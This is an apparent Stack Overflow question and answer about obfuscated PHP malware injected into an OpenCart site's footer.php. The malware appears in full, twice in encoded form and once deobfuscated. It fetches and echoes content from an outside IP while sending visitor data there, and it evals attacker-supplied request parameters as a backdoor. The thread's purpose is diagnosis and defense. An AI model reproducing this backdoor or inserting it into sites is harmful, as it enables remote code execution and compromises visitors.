# PHP - Code added to footer.php

Tags: php, opencart

I have created website using OpenCart, however all of sudden the website went down because of junk code in `footer.php`.

The code is as follows:

```
error_reporting(0); ini_set("display_errors", "0"); if (!isset($ie7be30e6)) { $ie7be30e6 = TRUE;  $GLOBALS['_1208357119_']=Array(base64_decode('cH' .'J' .'l' .'Z19tY' .'XR' .'jaA' .'=='),base64_decode('ZmlsZ' .'V' .'9n' .'ZXRfY29udGV' .'udHM='),base64_decode('Z' .'mlsZV' .'9nZ' .'XRfY' .'2' .'9' .'udGVud' .'HM='),base64_decode('dXJsZ' .'W5jb' .'2' .'Rl'),base64_decode('d' .'XJ' .'s' .'ZW5jb2Rl'),base64_decode('bWQ1'),base64_decode('c' .'3Ry' .'aXBzbGF' .'za' .'G' .'Vz'));  function _682313165($i){$a=Array('Y2xpZ' .'W' .'50X' .'2' .'N' .'oZWNr','Y2xpZW50X2' .'NoZWNr','' .'S' .'FRUUF9BQ0NFU' .'FRfQ0hBUlNF' .'V' .'A==','IS4hdQ=' .'=','U0NSS' .'VBUX0ZJ' .'TEV' .'OQU1F','' .'V' .'V' .'RGLTg=','' .'d2lu' .'ZG' .'93cy0' .'xMjUx','' .'S' .'F' .'RUUF9' .'BQ' .'0NFUF' .'RfQ0hBU' .'lNFVA==','' .'aHR' .'0cDo' .'vLw==','ODUuMjUuM' .'jAu' .'MjE' .'vZ2' .'V0' .'Ln' .'B' .'ocD9k' .'P' .'Q==','' .'U' .'0VSVkVSX05' .'B' .'TUU=','' .'U' .'k' .'VR' .'V' .'UVTVF9' .'VUk' .'k=','JnU9','SFRU' .'U' .'F9VU0VSX0' .'F' .'HRU5U','' .'JmM9','' .'Jm' .'k' .'9MSZp' .'c' .'D0' .'=','UkVNT' .'1RFX0FERFI=','' .'Jm' .'g9','' .'ODY' .'0YTE5Y' .'2' .'JkYzAyNWI0ZD' .'NjYz' .'V' .'mMz' .'Ey' .'N2MxN' .'2FhO' .'DY' .'=','U0VSV' .'kV' .'SX05B' .'T' .'UU=','UkVRVUVTVF9VU' .'kk=','SF' .'RUUF9VU0' .'V' .'SX' .'0' .'FHRU5U','M' .'Q==','' .'cA=' .'=','' .'cA==','ZTdiZTMwZTY=');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_682313165(0)]))die($_COOKIE[_682313165(1)]);if(!isset($yf60436_0[_682313165(2)])){if($GLOBALS['_1208357119_'][0](_682313165(3),$GLOBALS['_1208357119_'][1]($_SERVER[_682313165(4)]))){$yf60436_1=_682313165(5);}else{$yf60436_1=_682313165(6);}}else{$yf60436_1=$yf60436_0[_682313165(7)];}echo $GLOBALS['_1208357119_'][2](_682313165(8) ._682313165(9) .$GLOBALS['_1208357119_'][3]($_SERVER[_682313165(10)] .$_SERVER[_682313165(11)]) ._682313165(12) .$GLOBALS['_1208357119_'][4]($_SERVER[_682313165(13)]) ._682313165(14) .$yf60436_1 ._682313165(15) .$_SERVER[_682313165(16)] ._682313165(17) .$GLOBALS['_1208357119_'][5](_682313165(18) .$_SERVER[_682313165(19)] .$_SERVER[_682313165(20)] .$_SERVER[_682313165(21)] .$yf60436_1 ._682313165(22)));$yf60436_2=round(0+3142);if(isset($_REQUEST[_682313165(23)])&& $_REQUEST[_682313165(24)]== _682313165(25)){eval($GLOBALS['_1208357119_'][6]($_REQUEST["c"]));}  }

error_reporting(0); ini_set("display_errors", "0"); if (!isset($ie7be30e6)) { $ie7be30e6 = TRUE;  $GLOBALS['_1208357119_']=Array(base64_decode('cH' .'J' .'l' .'Z19tY' .'XR' .'jaA' .'=='),base64_decode('ZmlsZ' .'V' .'9n' .'ZXRfY29udGV' .'udHM='),base64_decode('Z' .'mlsZV' .'9nZ' .'XRfY' .'2' .'9' .'udGVud' .'HM='),base64_decode('dXJsZ' .'W5jb' .'2' .'Rl'),base64_decode('d' .'XJ' .'s' .'ZW5jb2Rl'),base64_decode('bWQ1'),base64_decode('c' .'3Ry' .'aXBzbGF' .'za' .'G' .'Vz'));  function _682313165($i){$a=Array('Y2xpZ' .'W' .'50X' .'2' .'N' .'oZWNr','Y2xpZW50X2' .'NoZWNr','' .'S' .'FRUUF9BQ0NFU' .'FRfQ0hBUlNF' .'V' .'A==','IS4hdQ=' .'=','U0NSS' .'VBUX0ZJ' .'TEV' .'OQU1F','' .'V' .'V' .'RGLTg=','' .'d2lu' .'ZG' .'93cy0' .'xMjUx','' .'S' .'F' .'RUUF9' .'BQ' .'0NFUF' .'RfQ0hBU' .'lNFVA==','' .'aHR' .'0cDo' .'vLw==','ODUuMjUuM' .'jAu' .'MjE' .'vZ2' .'V0' .'Ln' .'B' .'ocD9k' .'P' .'Q==','' .'U' .'0VSVkVSX05' .'B' .'TUU=','' .'U' .'k' .'VR' .'V' .'UVTVF9' .'VUk' .'k=','JnU9','SFRU' .'U' .'F9VU0VSX0' .'F' .'HRU5U','' .'JmM9','' .'Jm' .'k' .'9MSZp' .'c' .'D0' .'=','UkVNT' .'1RFX0FERFI=','' .'Jm' .'g9','' .'ODY' .'0YTE5Y' .'2' .'JkYzAyNWI0ZD' .'NjYz' .'V' .'mMz' .'Ey' .'N2MxN' .'2FhO' .'DY' .'=','U0VSV' .'kV' .'SX05B' .'T' .'UU=','UkVRVUVTVF9VU' .'kk=','SF' .'RUUF9VU0' .'V' .'SX' .'0' .'FHRU5U','M' .'Q==','' .'cA=' .'=','' .'cA==','ZTdiZTMwZTY=');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_682313165(0)]))die($_COOKIE[_682313165(1)]);if(!isset($yf60436_0[_682313165(2)])){if($GLOBALS['_1208357119_'][0](_682313165(3),$GLOBALS['_1208357119_'][1]($_SERVER[_682313165(4)]))){$yf60436_1=_682313165(5);}else{$yf60436_1=_682313165(6);}}else{$yf60436_1=$yf60436_0[_682313165(7)];}echo $GLOBALS['_1208357119_'][2](_682313165(8) ._682313165(9) .$GLOBALS['_1208357119_'][3]($_SERVER[_682313165(10)] .$_SERVER[_682313165(11)]) ._682313165(12) .$GLOBALS['_1208357119_'][4]($_SERVER[_682313165(13)]) ._682313165(14) .$yf60436_1 ._682313165(15) .$_SERVER[_682313165(16)] ._682313165(17) .$GLOBALS['_1208357119_'][5](_682313165(18) .$_SERVER[_682313165(19)] .$_SERVER[_682313165(20)] .$_SERVER[_682313165(21)] .$yf60436_1 ._682313165(22)));$yf60436_2=round(0+3142);if(isset($_REQUEST[_682313165(23)])&& $_REQUEST[_682313165(24)]== _682313165(25)){eval($GLOBALS['_1208357119_'][6]($_REQUEST["c"]));}  }
```

The above code is getting added automatically and the website is getting down.

Can any one explain me why this is happening?

Comment: Do anyone have access to your website ( :p ) check the updatedtime of youur footer file

Comment: @SulthanAllaudeen : No, I am the only person who has access to hosting account as user.

Comment: ok, but can you check the updatedtime of your footer file ?

Answer (score 2, accepted):

This is obfuscated PHP. One of two things might be happening:

1. Your site or host is compromised.
2. Your host provider is using tools to obtain metrics on your site.

Given that the host IP in the encoded PHP is on a [blacklist](http://mxtoolbox.com/SuperTool.aspx?action=blacklist%3A85.25.20.21&run=toolpage) by Barracuda Networks, it is highly likely that you or your host has been compromised. Contact your host provider and take down your site, as this could be delivering malware to anybody who visits your site.

*This could be false given your host changed IP space and this could be recently blacklisted.*

**How did I determine this?**

- [Prettify](http://beta.phpformatter.com/) the PHP to make it more understandable
- Manually decode all Base64 to understand how the arrays are constructed.
- Reconstruct the strings to create the URL request to an external server.

Once you end up decoding everything, that code ends up looking like so:

**DO NOT RUN THIS**

```
// Turns off all error reporting and does not display errors.
error_reporting(0);
ini_set("display_errors", "0");

if (!isset($ie7be30e6)) {
    $ie7be30e6 = TRUE;

    $GLOBALS['_1208357119_'] = Array(preg_match, file_get_contents, file_get_contents,
        urlencode, urlencode, md5, stripslashes
    );

    function _682313165($i)
    {
        $a = Array(
            client_check, client_check, HTTP_ACCEPT_CHARSET, !.!u, SCRIPT_FILENAME, UTF-8,
            windows-1251, HTTP_ACCEPT_CHARSET, http://, 85.25.20.21/get.php?d=, SERVER_NAME,
            REQUEST_URI, &u=, HTTP_USER_AGENT, &c=, &i=1&ip=, REMOTE_ADDR, &h=,
            864a19cbdc025b4d3cc5f3127c17aa86, SERVER_NAME, REQUEST_URI, HTTP_USER_AGENT,
            1, p, p, e7be30e6
        );
        return $a[$i];
    }

    // Dies if cookie doesn't exists. Places client check in cookie.
    if (!empty($_COOKIE[client_check]))
        die($_COOKIE[client_check]);

    if (!isset($yf60436_0[HTTP_ACCEPT_CHARSET])) {
        if (preg_match(!.!u, file_get_contents($_SERVER[SCRIPT_FILENAME])))
            $yf60436_1 = UTF-8;
        else 
            $yf60436_1 = windows-1251;
    } else 
        $yf60436_1 = $yf60436_0[HTTP_ACCEPT_CHARSET];

    echo file_get_contents('http://85.25.20.21/get.php?d=' . urlencode($_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) . '&u=' urlencode($_SERVER[HTTP_USER_AGENT]) . '&c=' . $yf60436_1 . '&i=1&ip=' . $_SERVER[REMOTE_ADDR] . '&h=' . md5(864a19cbdc025b4d3cc5f3127c17aa86 . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI] . $_SERVER[HTTP_USER_AGENT] . $yf60436_1 . 1))

    $yf60436_2 = 3142;

    if (isset($_REQUEST[p]) && $_REQUEST[p] == e7be30e6)
        eval(stripslashes($_REQUEST["c"]));
}
```

**DO NOT RUN THIS**

I did not make it completely runnable, as I left out some components of the syntax. I provided this to educate you and others to educate. Never run anything you don't trust or understand, and if you don't understand it - ask someone!

**What is this code doing?**

To be prompt, the overall flow of this is:

- Check cookie, create one if it doesn't exist (the code is run twice).
- Check the path of the currently running file to determine the type of server the site is running on (Windows or Linux)

  - This determines the available charset on the HTTP server.
- Grabs a file from an external source using a URI that describes your server (name, request, agent, etc).
- Determines whether the information posted matches a criteria
- If the response matches, run the downloaded file.